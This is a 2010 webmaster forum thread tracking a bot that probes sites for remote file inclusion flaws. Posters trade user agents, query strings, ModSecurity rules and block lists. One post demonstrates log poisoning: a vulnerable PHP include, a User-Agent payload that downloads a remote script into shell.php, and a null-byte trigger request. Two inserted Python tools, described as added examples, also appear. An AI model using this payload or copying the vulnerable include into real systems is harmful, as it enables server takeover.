Search Engine Spider and User Agent Identification Forum

casper bot search attempts to infect sites
user agent changing almost daily
dstiles




msg:4160993
 10:47 pm on Jun 28, 2010 (gmt 0)

Seen quite a few of these over the past few days, generally in groups of half a dozen-ish. (Title is complete UA with correct spelling.)

Behaviour is odd: every hit seems to be to the same site and page with (probably) the same unique querystring (this denotes an actual file to download or view). At the END of the querystring the file's extension (.ged) is replaced by:
.%20%E2%80%A6/contact.php

This seems to be consistent, although I've only carried out a few spot-checks. It also indicates a hack attempt, since the site is not PHP anyway. It's odd that the characters are upper-ASCII apart from the space, suggesting a non-Latin character set.

Hits come from different IPs, sometimes repeats of previous ones (perhaps 5 or 6 IPs involved). All IPs seem to be from server farms apart from one which could be a server on a static business DSL line. Servers include softlayer and a multi-country (RIPE) server farm.

Initially I thought "distributed bot" but being from servers this is unlikely unless it's a proper bot such as camont, and there is almost nothing to indicate it might be (SEs show next to nothing apart from logs, which indicate I'm not alone).

Possibly it's a broken bot (replacing only the file extension seems dumb unless there is an exploitable system that includes those three letters).

Any ideas, folks?

 

BitStrike




msg:4161313
 1:34 pm on Jun 29, 2010 (gmt 0)

One of my websites was hacked a few hours ago and I think this was done by this bot. Or it just searches for vulnerabilities and reports them to the actual hacker. All files were removed and index.php and casper.php along with some other files were created in the root folder. There was a message like "hacked by casper" inside one of the files.
The site was built on e107, don't remember the actual version but it was definitely not the latest one.
More info is on the [e107.org...] web site.

keyplyr




msg:4161576
 7:56 pm on Jun 29, 2010 (gmt 0)

Does the UA string begin with casper?

dstiles




msg:4161687
 10:41 pm on Jun 29, 2010 (gmt 0)

If you mean me, keyplyr, the UA I gave in the title is the complete UA. :)

More today, including Russian servers (which seem to predominate) and an Australian server.

BitStrike - what were the logged URLs and querystrings?

Can't see how it could be a hack unless the querystring syntax broke the server? Is there a "ged" within your site's pagenames/querystrings?

I suppose the contact form page could compromise a server if it stores data into a SQL database but then there would have to be a second payload hit, I should have thought, which is a bit wasteful.

Just had another search on Google. This forum/topic at the top and thereafter almost nothing but logs until about #60 when it gives a forum reference. Sadly Google seems to have screwed up its translation service because it translated German into German (and in another case French into French). They really are getting worse! :(

rowan194




msg:4161803
 2:01 am on Jun 30, 2010 (gmt 0)

Here are the 3 UAs I've found so far-

Casper Bot Search
dex Bot Search
Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

I'm 403'ing anything presenting this user agent, then a script which runs every 15 mins adds a firewall rule for that IP. (They won't even be able to connect to the server, let alone request anything)

I've counted 268 unique IPs since just over a week ago, so I wouldn't be surprised if the requests are coming from compromised boxes.

dstiles




msg:4162198
 4:21 pm on Jun 30, 2010 (gmt 0)

I haven't seen dex bot.

I trapped the mozilla one for a couple of reasons without checking further but yes, it does have the contact.php querystring.

147 hits for contact.php, 142 for casper.

dstiles




msg:4162417
 10:50 pm on Jun 30, 2010 (gmt 0)

I've had a look at a few logs that google returns in serps. They do not seem to include the /contact.php but always seem to be the same querystring, though I've only checked half a dozen logs. The querystrings in those I looked at carry the word "casper" as in:

/casper/Ckrid1.txt?

(this seems to be a common point in the logs).

I tried looking in the actual file (a gedcom) for the name "casper" and it's not there so another theory bites the dust.

One google posting mentions casper doing a POST but very little other info. A couple of the serps relate it to exploits.

I have now found a couple of other forums saying this is an exploit attempt aimed at various things including PDFs. Type the following, including quotes, into google:

"casper bot search" exploit

One translated site mentions a "casper rule" which defines the life of something: not sure what as I ran out of patience trying to translate a wiki.

What I can't understand is its persistent hits on a single site/page/querystring. Every single hit, apart from the 404s it generates. For any kind of bot or exploit this is stupid.

thetrasher




msg:4162854
 4:53 pm on Jul 1, 2010 (gmt 0)

UA of "CASPER RFI CRACK Bot" seems to have been changed.

Yesterday:
$ua->agent('Casper Bot Search');
and
my $uagent = "Casper Bot Search";

Today:
$ua->agent('Mozilla/5.0');
and
my $uagent = "Mozilla/5.0";
dstiles




msg:4163650
 7:57 pm on Jul 2, 2010 (gmt 0)

Haven't seen that but it's now coming in with exactly the same querystring but with the UA:

sledink bot search

I guess this will morph a few more times as traps develop to kill known UAs. Generalisation helps!

enigma1




msg:4163909
 10:24 am on Jul 3, 2010 (gmt 0)

$ua->agent('Casper Bot Search'); ........ etc.


Looks like a classic hack attempt.

example: vulnerable local script contains code
<?php
// $_GET['p'] goes straight into the include path: local/remote file inclusion
include($_GET['p'].".php");
?>

Attacker synthesizes user agent code (a sample, as you may see it in the server logs, not encoded; they use all kinds of things)
<?php
// Sent in the User-Agent header so it lands in the access log; when the log is
// later included, it fetches a remote script and writes it out as shell.php
fwrite(fopen('shell.php','w'),
file_get_contents('http://www.example.com/injection.txt'));
?>

it is then utilized with a server request from the attacker:
index.php?p=/var/log/apache/access_log%00
(the %00 null byte truncates the path so the appended ".php" is ignored; PHP before 5.3.4 is affected)

executing the PHP code, or trying to see if the scripts disclose any other info.

I hope you get the idea; this is not original by any means, there are lots of discussions over the web if you want to search in depth. The code logged as a UA can have many variations.

Also they're trying different combinations based on server type and application language.

thetrasher




msg:4163960
 2:58 pm on Jul 3, 2010 (gmt 0)

Another UA:
rk q kangen
dstiles




msg:4164110
 10:06 pm on Jul 3, 2010 (gmt 0)

Three or four variations on "x bot search" UA today. Still hitting the same site/page/querystring exactly, with one variation from contact.php to discover.

incrediBILL




msg:4165009
 12:57 am on Jul 6, 2010 (gmt 0)

Yikes!

I haven't been paying attention but this one is nasty

I've seen UAs of "Casper Bot Search", "rk q kangen" and "MaMa CaSpEr"

They're all trying to find ways to upload files to my site such as:
"somepage.html?path=http://www.example.com/www/data/casper/Ckrid1.txt?"

I would block anything with "/casper/" in the query string as an added measure of protection.

dstiles




msg:4165439
 9:42 pm on Jul 6, 2010 (gmt 0)

Not just casper. I would suggest anything with "bot search" in the UA as that seems to be common to many (all?) I've seen so far, including "dex" and "plaNETWORK" (sic).

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

All those I've seen seem to come from compromised servers from ThePlanet down to tin-pot little RIPE ones I've never encountered before. In fact there have been a lot of the latter!

I've only caught two new IPs today (although several old ones) so perhaps they're running out of server farms I haven't yet blocked.

And most are from server farms, with just two or three from business ranges that are probably running open servers.

I still can't understand why they're only hitting one site out of several dozen, and only a single page. Seems very inefficient to me. But hey! let's root for inefficiency! :)

Dijkgraaf




msg:4165494
 12:21 am on Jul 7, 2010 (gmt 0)

Same bot, new UA MaMa CaSpEr
Also pointing a parameter to Ckrid1.txt

Ujang




msg:4165657
 9:24 am on Jul 7, 2010 (gmt 0)

Ok, blocking "bot search" may be a little drastic... Does anyone know if any genuine bot has that phrase in its UA?

How about just allowing several popular bots to access your site? Additionally, one could perform a DNS reverse lookup to ensure the origin of that bot.

popular UA: [user-agents.org...]

how to verify bot: [google.com...]

----

Below could be another way to identify a bad bot..

source: Google Webmaster Blog: In order to fetch from the "official" Googlebot IP range, the bot has to respect robots.txt and our internal hostload conventions so that Google doesn't crawl you too hard.

then you might create a hidden link > block it via robots.txt > see if any bot reaches that link > get the IP > block it!

just my 2cents
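The reverse-lookup verification Ujang mentions, done as forward-confirmed reverse DNS: the PTR name for the client IP must fall under a hostname suffix the crawler operator publishes, and that name must resolve forward to the same IP, otherwise a spoofed PTR record passes. This is an added example, not code from the thread. The resolver functions are injectable so the constructed stub answers below run offline; only the Googlebot suffixes (googlebot.com, google.com) come from Google's published guidance, and the example IPs and hostnames are made up.

```python
"""Forward-confirmed reverse DNS (FCrDNS) check for a client claiming to be a crawler.

Added example, not from the thread. Default resolvers use the socket module;
the FAKE_* tables are constructed answers so the check can be exercised offline.
"""
import socket

# Reverse-DNS suffixes accepted per claimed crawler. Googlebot's are documented by
# Google; add other vendors only from their own documentation.
CRAWLER_SUFFIXES = {
    "googlebot": (".googlebot.com", ".google.com"),
}


def _default_reverse(ip):
    """PTR lookup via the system resolver."""
    return socket.gethostbyaddr(ip)[0]


def _default_forward(host):
    """All A/AAAA answers for host, as a set of IP strings."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def verify_crawler(ip, crawler, reverse=_default_reverse, forward=_default_forward):
    """Return (ok, detail). ok is True only when PTR(ip) is under an accepted suffix
    AND that PTR name resolves forward to ip again. A PTR alone is attacker-controlled."""
    suffixes = CRAWLER_SUFFIXES.get(crawler.lower())
    if not suffixes:
        return False, f"no suffix list for {crawler!r}"
    try:
        ptr = reverse(ip).rstrip(".").lower()
    except OSError as exc:
        return False, f"no PTR record for {ip}: {exc}"
    if not ptr.endswith(suffixes):
        return False, f"PTR {ptr} not under {suffixes}"
    try:
        forward_ips = forward(ptr)
    except OSError as exc:
        return False, f"forward lookup of {ptr} failed: {exc}"
    if ip not in forward_ips:
        return False, f"{ptr} resolves to {sorted(forward_ips)}, not {ip}"
    return True, f"{ip} <-> {ptr} confirmed"


# Constructed resolver answers (assumptions, not real DNS data).
FAKE_PTR = {
    "66.249.66.1": "crawl-66-249-66-1.googlebot.com",  # genuine-looking, forward matches
    "203.0.113.5": "crawl-66-249-66-1.googlebot.com",  # spoofed PTR: forward does not match
    "198.51.100.9": "srv9.example.net",                # not a crawler hostname at all
}
FAKE_FORWARD = {
    "crawl-66-249-66-1.googlebot.com": {"66.249.66.1"},
    "srv9.example.net": {"198.51.100.9"},
}


def fake_reverse(ip):
    try:
        return FAKE_PTR[ip]
    except KeyError:
        raise socket.herror(1, "Unknown host")  # herror is an OSError subclass


def fake_forward(host):
    return FAKE_FORWARD.get(host, set())


if __name__ == "__main__":
    for ip in ("66.249.66.1", "203.0.113.5", "198.51.100.9", "192.0.2.1"):
        print(ip, verify_crawler(ip, "Googlebot", reverse=fake_reverse, forward=fake_forward))
```

Call verify_crawler with the defaults in production; the forward step is the part that defeats a compromised host that simply sets its own PTR to a googlebot.com name.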

maximillianos




msg:4165737
 12:30 pm on Jul 7, 2010 (gmt 0)

How can you tell if your server has been compromised? We see this bot hitting our logs (only about 30 attempts since June 21st).

I don't see a new "index.php" or "casper.php" in my root. Any other symptoms to watch out for?

maximillianos




msg:4165742
 12:41 pm on Jul 7, 2010 (gmt 0)

It may be worth noting that there is a city named Casper in Wyoming. Not sure if that affects anyone who is blocking "Casper" in the query string.

profo




msg:4165893
 4:37 pm on Jul 7, 2010 (gmt 0)

It appears to be an e107 issue, with a security bug in contact.php. Another user agent I found is: "kmccrew Bot Search".

@max, symptoms not clear. One may consider to block POST queries with a user agent as mentioned above (not: query strings).

dstiles




msg:4165989
 6:23 pm on Jul 7, 2010 (gmt 0)

Ujang, thanks but I have it covered. I'm merely speculating on hits I see and trying to help out here. :)

incrediBILL




msg:4166020
 7:21 pm on Jul 7, 2010 (gmt 0)

One may consider to block POST queries with a user agent as mentioned above (not: query strings)


The hits on my site aren't POSTs, they are GETs, so the query string is where I block the attack, by actually restricting anything with "http:" in the query string to prevent anything from being uploaded, since the rest of the attack vectors seem to be random.

Of course this will break some software/sites so I don't recommend it for everyone, but it stops it cold on my server.
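A log-scanning check that combines the indicators the thread has converged on: the "bot search"/casper/kangen UA family dstiles suggests blocking on, incrediBILL's "/casper/" and "http:"-in-the-query-string rules, and the contact.php suffix from the opening post. This is an added example, not code from the thread. The log lines are constructed in Apache combined format with documentation-range IPs, and the UA marker list and reason strings are my own. Two details worth noting: %20%E2%80%A6 URL-decodes to a space followed by U+2026 (the UTF-8 ellipsis), and the Casper, Wyoming search in the sample is deliberately left unflagged, per maximillianos' caveat, because only "/casper/" with slashes is matched.

```python
"""Flag RFI-probe requests in Apache combined-format access logs.

Added example, not code from the thread. SAMPLE_LOG is constructed (RFC 5737
documentation IPs); UA_MARKERS and the reason strings are assumptions based on
the user agents and query strings posters reported.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# host ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Lower-cased fragments of the UAs seen in the thread; "bot search" is the family marker.
UA_MARKERS = ("bot search", "casper", "rk q kangen")
# A parameter value that is itself a URL is the classic RFI tell (the "http:" rule).
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

SAMPLE_LOG = """\
203.0.113.10 - - [28/Jun/2010:22:47:01 +0000] "GET /gedcom/view.asp?file=smith.%20%E2%80%A6/contact.php HTTP/1.1" 404 512 "-" "Casper Bot Search"
203.0.113.11 - - [30/Jun/2010:04:11:52 +0000] "GET /somepage.html?path=http://www.example.com/www/data/casper/Ckrid1.txt? HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Jul/2010:21:30:02 +0000] "POST /I[DEX]887 HTTP/1.1" 404 300 "-" "MaMa CaSpEr"
192.0.2.50 - - [07/Jul/2010:09:15:33 +0000] "GET /search.asp?q=Casper+Wyoming HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/3.6"
192.0.2.51 - - [07/Jul/2010:09:16:00 +0000] "GET /index.html HTTP/1.1" 200 4000 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"""


def parse_line(line):
    """Return ip/time/method/target/status/ua for one combined-format line, or None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def probe_reasons(rec):
    """List the indicators that mark one parsed request as an RFI probe (empty if clean)."""
    reasons = []
    ua = rec["ua"].lower()
    for marker in UA_MARKERS:
        if marker in ua:
            reasons.append(f"ua contains {marker!r}")
            break
    query = urlsplit(rec["target"]).query
    decoded = unquote(query).lower()  # %20%E2%80%A6 becomes " " + U+2026
    if "/casper/" in decoded:
        reasons.append("'/casper/' in query string")
    if "contact.php" in decoded:
        reasons.append("contact.php appended to query string")
    # Only parameter *values* are checked, so a URL in the UA (e.g. Googlebot's) is ignored.
    for _, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            reasons.append(f"remote URL in parameter: {value}")
            break
    return reasons


def scan(lines):
    """Map each offending client IP to the sorted list of distinct reasons seen for it."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = probe_reasons(rec)
        if reasons:
            hits.setdefault(rec["ip"], set()).update(reasons)
    return {ip: sorted(r) for ip, r in hits.items()}


def ips_to_block(lines):
    """Sorted list of client IPs that produced at least one indicator."""
    return sorted(scan(lines))


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", "; ".join(reasons))
```

The IP list is what a periodic job like rowan194's would turn into firewall rules. Because this works from the access log it sees only the request line, so the POST variants reported later in the thread need body inspection (ModSecurity or the application itself) rather than log matching.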

maximillianos




msg:4166077
 8:41 pm on Jul 7, 2010 (gmt 0)

Mine are GET requests as well.

caribguy




msg:4166104
 9:26 pm on Jul 7, 2010 (gmt 0)

Profo are you sure e107 is related? Haven't seen 'Casper' at all.

e107 probes: e107.css on May 25 to the ip address with the old Toata dragostea UA, and contact.php on June 14 to a handful of domains with a Googlebot UA.

dstiles




msg:4166155
 10:35 pm on Jul 7, 2010 (gmt 0)

All the casper hits today were POSTs. Haven't checked earlier logs but the pattern is the same in my security logs and always trying to hit contact.php. The contact.php in the querystring looks like some reaction to the simple POST to contact.php (without a querystring), which precedes the querystring hit. Both hits get 403s.

incrediBILL




msg:4166167
 10:52 pm on Jul 7, 2010 (gmt 0)

OK, I stand corrected, most of the activity today is totally different from the past few days.

Mostly seeing this coming from So. Korea:
"POST /I[DEX]887 HTTP/1.1" "MaMa CaSpEr"


I don't even know what the heck "/I[DEX]887" is or why anyone would try to post to it but those stupid scripts tried about 30 times with some variations.

Also had a couple of "contact.php" hits from Germany with a Firefox UA:
"POST /contact.php HTTP/1.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"


Wonder why the sudden shift from GET to POST?

At a minimum the POST no longer exposes the source of the file they're attempting to upload in a log file so it makes it a little harder to figure out the source of the hacked computer and take it down.

maximillianos




msg:4166197
 12:33 am on Jul 8, 2010 (gmt 0)

It seems to have given up our site for now (knock on wood). We last saw it on the 5th when it was still using the GET method.

That is unless it is under a name we have not checked for... which is highly likely.

frontpage




msg:4166457
 1:10 pm on Jul 8, 2010 (gmt 0)

A few ModSecurity 2.x rules

# 2.x addresses request headers as REQUEST_HEADERS:Name (HTTP_User-Agent was the 1.x form);
# (?i) makes the match case-insensitive; rule ids are arbitrary local numbers and are
# mandatory from ModSecurity 2.7 on
SecRule REQUEST_HEADERS:User-Agent "@rx (?i)casper" "id:1000101,phase:1,deny,log,status:403"
SecRule REQUEST_HEADERS:User-Agent "@rx (?i)kangen" "id:1000102,phase:1,deny,log,status:403"
SecRule REQUEST_HEADERS:User-Agent "@rx (?i)mama" "id:1000103,phase:1,deny,log,status:403"

incrediBILL




msg:4166772
 8:06 pm on Jul 8, 2010 (gmt 0)

Is this casper thing done?

I haven't seen a single hit from any of its variants today.

dstiles




msg:4166827
 9:18 pm on Jul 8, 2010 (gmt 0)

Still coming as of a couple of hours ago.

If anyone is interested I have two sets of post/querystring data. Quite a difference between the two sets, one of which is an eval of a BASE64 string. Possibly other sets are different again but I only traced two.

incrediBILL




msg:4167389
 8:11 pm on Jul 9, 2010 (gmt 0)

Sharing the post data would be great
Post it and I'll edit if needed
